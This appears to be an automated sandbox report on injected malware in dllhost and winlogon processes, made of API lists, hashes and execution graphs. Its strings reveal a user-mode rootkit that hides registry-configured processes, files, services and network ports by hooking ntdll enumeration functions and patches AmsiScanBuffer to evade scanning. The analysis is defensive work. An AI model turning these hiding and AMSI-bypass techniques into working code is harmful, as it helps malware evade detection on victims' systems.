                                                          • Opcode ID: 062723520bc959b99614c26b60837a5fa848bce833f489094e5110284047cdb9
                                                          • Instruction ID: fe181f3da7762b1cf8407140d3e190fa013b7b60483d6e0a4c0671c43d788581
                                                          • Opcode Fuzzy Hash: 062723520bc959b99614c26b60837a5fa848bce833f489094e5110284047cdb9
                                                          • Instruction Fuzzy Hash: ACD16FB270568187EB65CF63F84479AB7A0F788BC4F044025EB8A47BA4DF78D599CB04

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: 3db9478a101194b55b940351d2e6744c1199954fa76c07e8abb2f2f05a3be27a
                                                          • Instruction ID: cbe0a9e96035c6652df35f1bebe582e7c0167c489293dce8c24ece8bd57d0938
                                                          • Opcode Fuzzy Hash: 3db9478a101194b55b940351d2e6744c1199954fa76c07e8abb2f2f05a3be27a
                                                          • Instruction Fuzzy Hash: C35128B2604B8486EB56DF62F4483AA77A1F78CBD5F444124EB4A07B79DF38C555C700
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                          • String ID:
                                                          • API String ID: 4184240511-0
                                                          • Opcode ID: 84ff88ccb10f49b49e4af97301c9a9495f723d3e4f2f51ef83b7847e1ee965a3
                                                          • Instruction ID: 0e6833bd3eeca7de3220de005558475a35c56d9be5ad7e086776b2a4e8a7938b
                                                          • Opcode Fuzzy Hash: 84ff88ccb10f49b49e4af97301c9a9495f723d3e4f2f51ef83b7847e1ee965a3
                                                          • Instruction Fuzzy Hash: 894147B2700A859AE711CF6AE8843DD73B1FB89B89F445225FF0A43A69DF38C159C304

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
                                                          • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 3993315683-3572789727
                                                          • Opcode ID: 160cb157803c8d75397eda194766d4b99425b2e4efbbed3557b40dfd9c0fc54d
                                                          • Instruction ID: 5ebcb72c0a3035c4b67d8f00751cefd31434bbf5df89411654f5c91112f76ea3
                                                          • Opcode Fuzzy Hash: 160cb157803c8d75397eda194766d4b99425b2e4efbbed3557b40dfd9c0fc54d
                                                          • Instruction Fuzzy Hash: 0171D3B6310A5086EB22EF66F8507D923A4FB88BC8F016125FB4D97A7ADE38C554C744
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: e46bc08d923f3710a6f0b6657d2c3335541900ed0314ce9ea7860df7b3fef6c0
                                                          • Instruction ID: 42b997484051ce9e6daf6bc3104cf1544be02307d9272190f1dec121864cc25c
                                                          • Opcode Fuzzy Hash: e46bc08d923f3710a6f0b6657d2c3335541900ed0314ce9ea7860df7b3fef6c0
                                                          • Instruction Fuzzy Hash: E1412AB2214B84C6E765CF62F4447DA77A1F388B98F448129EB8907B68DF38C589CB40
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Delete$CloseEnumOpen
                                                          • String ID: SOFTWARE\$nya-config
                                                          • API String ID: 3013565938-2636501262
                                                          • Opcode ID: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                                          • Instruction ID: 8421849941bfc07d5c6a41991bb422c7bbd6d954f4ecfba192073c561d1589c4
                                                          • Opcode Fuzzy Hash: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                                          • Instruction Fuzzy Hash: 301186B2614A8485E761CF26F8447D923B4F78C7D8F405205E75D0BAA9DF7CC258CB19
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Free
                                                          • String ID:
                                                          • API String ID: 3168794593-0
                                                          • Opcode ID: 80d9ba640633e664d37536508cc0a4a26b735903ebb0d8b8d4ae8ea91fecf4e1
                                                          • Instruction ID: ae713076178dcd36b59d2bede7e3524c8608a398496d325058d9822cf47af1f0
                                                          • Opcode Fuzzy Hash: 80d9ba640633e664d37536508cc0a4a26b735903ebb0d8b8d4ae8ea91fecf4e1
                                                          • Instruction Fuzzy Hash: D80102B2610A908AE705EF67B90438977A1F78CFC5F4A4025FB9953739DE38D491C744
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: ntdll.dll
                                                          • API String ID: 1646373207-2227199552
                                                          • Opcode ID: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                                          • Instruction ID: 17fa8e42c722db624f1936625922d1a8ab69534039b48c71a9bb0a293c881c2b
                                                          • Opcode Fuzzy Hash: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                                          • Instruction Fuzzy Hash: CAD0C9F8B1260182EF1AEB6778553E152515B6DBC9F4940209F0647772DE38C0E48318
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 47ff0fd0a0ed3f45e3b7bef41ad735f8b2bd5774596bf556d838e1702c2b3cda
                                                          • Instruction ID: 1511527892a3fb8eded8389ff9e17f75ca8e9e74a60c21ae91e61c536c9c2234
                                                          • Opcode Fuzzy Hash: 47ff0fd0a0ed3f45e3b7bef41ad735f8b2bd5774596bf556d838e1702c2b3cda
                                                          • Instruction Fuzzy Hash: 39E039F170160086E705DB63E80438936E1EB8CB81F858024DA1907371DF7D84D98750
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: c318bc90e8eaf306909f2f681ed70c0ee622173829c7eddc2bb167e283e0ca4a
                                                          • Instruction ID: 4369636dfc19c6b46be3dddb2077bf5e2e0bd1da0e3c66b1f75a47794e7da392
                                                          • Opcode Fuzzy Hash: c318bc90e8eaf306909f2f681ed70c0ee622173829c7eddc2bb167e283e0ca4a
                                                          • Instruction Fuzzy Hash: 78E0E5F1751A0086E70ADB63E80439976E1FB8CB91F898024EA1907731EE3884D98A24

                                                          Execution Graph

                                                          Execution Coverage:1.4%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:2.5%
                                                          Total number of Nodes:118
                                                          Total number of Limit Nodes:19
                                                          execution_graph 22465 225dc6441f9 22468 225dc644146 _invalid_parameter_noinfo 22465->22468 22466 225dc6441b0 22467 225dc644196 VirtualQuery 22467->22466 22467->22468 22468->22466 22468->22467 22469 225dc6441ca VirtualAlloc 22468->22469 22469->22466 22470 225dc6441fb GetLastError 22469->22470 22470->22468 22472 225dc641e3c LoadLibraryA GetProcAddress 22473 225dc641e62 SleepEx 22472->22473 22474 225dc641e6f 22472->22474 22473->22473 22475 225dc67d220 22480 225dc67d231 __std_exception_copy 22475->22480 22476 225dc67d282 22483 225dc67d1f4 13 API calls __std_exception_copy 22476->22483 22477 225dc67d266 HeapAlloc 22478 225dc67d280 22477->22478 22477->22480 22480->22476 22480->22477 22482 225dc67b470 EnterCriticalSection LeaveCriticalSection __std_exception_copy 22480->22482 22482->22480 22483->22478 22484 225dc641bc4 22491 225dc641724 GetProcessHeap HeapAlloc 22484->22491 22486 225dc641bda SleepEx 22487 225dc641724 50 API calls 22486->22487 22489 225dc641bd3 22487->22489 22489->22486 22490 225dc64159c StrCmpIW StrCmpW 22489->22490 22542 225dc6419b0 12 API calls 22489->22542 22490->22489 22543 225dc641264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22491->22543 22493 225dc64174c 22544 225dc641000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22493->22544 22495 225dc641754 22545 225dc641264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22495->22545 22497 225dc64175d 22546 225dc641264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22497->22546 22499 225dc641766 22547 225dc641264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22499->22547 22501 225dc64176f 22548 225dc641000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22501->22548 22503 225dc641778 22549 225dc641000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22503->22549 22505 225dc641781 22550 225dc641000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22505->22550 22507 225dc64178a RegOpenKeyExW 22508 225dc6417bc RegOpenKeyExW 22507->22508 22509 225dc6419a2 22507->22509 22510 225dc6417fb RegOpenKeyExW 22508->22510 22511 225dc6417e5 22508->22511 22509->22489 22513 225dc641836 RegOpenKeyExW 22510->22513 22514 225dc64181f 22510->22514 22557 225dc6412b8 16 API calls 22511->22557 22516 225dc64185a 22513->22516 22517 225dc641871 RegOpenKeyExW 22513->22517 22551 225dc64104c RegQueryInfoKeyW 22514->22551 22558 225dc6412b8 16 API calls 22516->22558 22521 225dc6418ac RegOpenKeyExW 22517->22521 22522 225dc641895 22517->22522 22518 225dc6417f1 RegCloseKey 22518->22510 22525 225dc6418e7 RegOpenKeyExW 22521->22525 22526 225dc6418d0 22521->22526 22559 225dc6412b8 16 API calls 22522->22559 22523 225dc641867 RegCloseKey 22523->22517 22529 225dc64190b 22525->22529 22530 225dc641922 RegOpenKeyExW 22525->22530 22560 225dc6412b8 16 API calls 22526->22560 22527 225dc6418a2 RegCloseKey 22527->22521 22531 225dc64104c 6 API calls 22529->22531 22532 225dc641946 22530->22532 22533 225dc64195d RegOpenKeyExW 22530->22533 22535 225dc641918 RegCloseKey 22531->22535 22536 225dc64104c 6 API calls 22532->22536 22537 225dc641998 RegCloseKey 22533->22537 22538 225dc641981 22533->22538 22534 225dc6418dd RegCloseKey 22534->22525 22535->22530 22539 225dc641953 RegCloseKey 22536->22539 22537->22509 22540 225dc64104c 6 API calls 22538->22540 22539->22533 22541 225dc64198e RegCloseKey 22540->22541 22541->22537 22543->22493 22544->22495 22545->22497 22546->22499 22547->22501 22548->22503 22549->22505 22550->22507 22552 225dc6411b5 RegCloseKey 22551->22552 22553 225dc6410bf 22551->22553 22552->22513 22553->22552 22554 225dc6410cf RegEnumValueW 22553->22554 22555 225dc641125 22554->22555 22555->22552 22555->22554 22556 225dc64114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 22555->22556 22556->22555 22557->22518 22558->22523 22559->22527 22560->22534 22561 225dc645c8d 22563 225dc645c94 22561->22563 22562 225dc645cfb 22563->22562 22564 225dc645d77 VirtualProtect 22563->22564 22565 225dc645db1 22564->22565 22566 225dc645da3 GetLastError 22564->22566 22566->22565 22567 225dc64f370 VirtualProtect 22568 225dc646430 22569 225dc64643d 22568->22569 22570 225dc646449 22569->22570 22577 225dc64655a 22569->22577 22571 225dc64647e 22570->22571 22572 225dc6464cd 22570->22572 22573 225dc6464a6 SetThreadContext 22571->22573 22573->22572 22574 225dc646581 VirtualProtect FlushInstructionCache 22574->22577 22575 225dc64663e 22576 225dc64665e 22575->22576 22586 225dc644b20 VirtualFree 22575->22586 22587 225dc645530 GetCurrentProcess 22576->22587 22577->22574 22577->22575 22580 225dc646663 22581 225dc6466b7 22580->22581 22582 225dc646677 ResumeThread 22580->22582 22591 225dc648070 8 API calls 2 library calls 22581->22591 22583 225dc6466ab 22582->22583 22583->22580 22585 225dc6466ff 22586->22576 22588 225dc64554c 22587->22588 22589 225dc645562 VirtualProtect FlushInstructionCache 22588->22589 22590 225dc645593 22588->22590 22589->22588 22590->22580 22591->22585 22592 225dc642c80 TlsGetValue TlsGetValue TlsGetValue 22593 225dc642cd9 22592->22593 22594 225dc642d51 NtEnumerateValueKey 22592->22594 22593->22594 22602 225dc642ce1 22593->22602 22595 225dc642d86 22594->22595 22596 225dc642d4c 22594->22596 22595->22596 22598 225dc642e06 TlsSetValue TlsSetValue TlsSetValue 22595->22598 22599 225dc642da0 NtEnumerateValueKey 22595->22599 22601 225dc643f88 StrCmpNIW 22595->22601 22597 225dc642d2d NtEnumerateValueKey 22597->22596 22597->22602 22598->22596 22599->22595 22601->22595 22602->22596 22602->22597 22602->22598 22603 225dc643f88 22602->22603 22604 225dc643f95 StrCmpNIW 22603->22604 22605 225dc643faa 22603->22605 22604->22605 22605->22602

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Value$Enumerate
                                                          • String ID:
                                                          • API String ID: 3520290360-0
                                                          • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                          • Instruction ID: a0c12a1f98a87ea879fde35af57b915faa0522e2d4c8012c639be39e88e0e21e
                                                          • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                          • Instruction Fuzzy Hash: 8C51933961CE61A7E765CF9EE448A5AB3A0F788B86F60C159DE4B43B54DF38C845CB00

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 223 225dc641e3c-225dc641e60 LoadLibraryA GetProcAddress 224 225dc641e62-225dc641e6d SleepEx 223->224 225 225dc641e6f-225dc641e73 223->225 224->224
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProcSleep
                                                          • String ID: AmsiScanBuffer$amsi.dll
                                                          • API String ID: 188063004-3248079830
                                                          • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                          • Instruction ID: b943b4d4fec2722a97f31a6593bd222e515073a37d9d17746b47865a0752c427
                                                          • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                          • Instruction Fuzzy Hash: 02D0671C625E24F6EE186B9DE89C7543261AB68B03FE49455C50B012A0EE3C8559C340

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                          • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 2135414181-3572789727
                                                          • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                          • Instruction ID: c163acaebe60ea4311e68be09e509954e4c92294b53dd205c1ff3ab862208a51
                                                          • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                          • Instruction Fuzzy Hash: 4771133A724E61A6EB109FA9E85869D3374FB88B8AF909112DD4E57B68EF34C444C740

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                          • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                          • API String ID: 1735320900-4225371247
                                                          • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                          • Instruction ID: f29ca842126068601b63f5b890003817ffb932e00ebe5f9bb7d400ae7e1bf134
                                                          • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                          • Instruction Fuzzy Hash: 96519D6C568E6AB6EB01EFECEC5C7D93720A74474BFA0C593940A52175EF3C825AC340

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                          • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                          • API String ID: 740688525-1880043860
                                                          • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                          • Instruction ID: 4da6f4d7dae9b34e047b1af2eeeb94523d213e1203e1e1d78f3bf8175cea8fad
                                                          • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                          • Instruction Fuzzy Hash: 2751C63971CF24B1EE149BEA98083A53290BB48BB2F588725EE3E477C0EF38D445C641

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 151 225dc646270-225dc646297 152 225dc646299-225dc6462a8 151->152 153 225dc6462ab-225dc6462b6 GetCurrentThreadId 151->153 152->153 154 225dc6462b8-225dc6462bd 153->154 155 225dc6462c2-225dc6462c9 153->155 156 225dc6466ef-225dc646706 call 225dc648070 154->156 157 225dc6462db-225dc6462ef 155->157 158 225dc6462cb-225dc6462d6 call 225dc6460a0 155->158 161 225dc6462fe-225dc646304 157->161 158->156 164 225dc64630a-225dc646313 161->164 165 225dc6463d5-225dc6463f6 161->165 167 225dc64635a-225dc6463cd call 225dc644c50 call 225dc644bf0 call 225dc644bb0 164->167 168 225dc646315-225dc646358 call 225dc653a40 164->168 169 225dc6463fc-225dc64641c GetThreadContext 165->169 170 225dc64655f-225dc646570 call 225dc647bff 165->170 180 225dc6463d0 167->180 168->180 173 225dc64655a 169->173 174 225dc646422-225dc646443 169->174 184 225dc646575-225dc64657b 170->184 173->170 174->173 183 225dc646449-225dc646452 174->183 180->161 186 225dc6464d2-225dc6464e3 183->186 187 225dc646454-225dc646465 183->187 188 225dc646581-225dc6465d8 VirtualProtect FlushInstructionCache 184->188 189 225dc64663e-225dc64664e 184->189 197 225dc646555 186->197 198 225dc6464e5-225dc646503 186->198 193 225dc646467-225dc64647c 187->193 194 225dc6464cd 187->194 195 225dc646609-225dc646639 call 225dc647fdc 188->195 196 225dc6465da-225dc6465e4 188->196 191 225dc64665e-225dc64666a call 225dc645530 189->191 192 225dc646650-225dc646657 189->192 213 225dc64666f-225dc646675 191->213 192->191 201 225dc646659 call 225dc644b20 192->201 193->194 203 225dc64647e-225dc6464c8 call 225dc6440b0 SetThreadContext 193->203 194->197 195->184 196->195 204 225dc6465e6-225dc646601 call 225dc644ad0 196->204 198->197 205 225dc646505-225dc646550 call 225dc644040 call 225dc647c1d 198->205 201->191 203->194 204->195 205->197 217 225dc6466b7-225dc6466d5 213->217 218 225dc646677-225dc6466b5 ResumeThread call 225dc647fdc 213->218 220 225dc6466e9 217->220 221 225dc6466d7-225dc6466e6 217->221 218->213 220->156 221->220
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Thread$Current$Context
                                                          • String ID:
                                                          • API String ID: 1666949209-0
                                                          • Opcode ID: 06345c450f8296db91144f59c54cbd40b4799d269efc1b0e1a6bce112c420a70
                                                          • Instruction ID: 295b081cb87bf85b7e110addeb5a6b591f47254ecbc1534d835875b48c3d2520
                                                          • Opcode Fuzzy Hash: 06345c450f8296db91144f59c54cbd40b4799d269efc1b0e1a6bce112c420a70
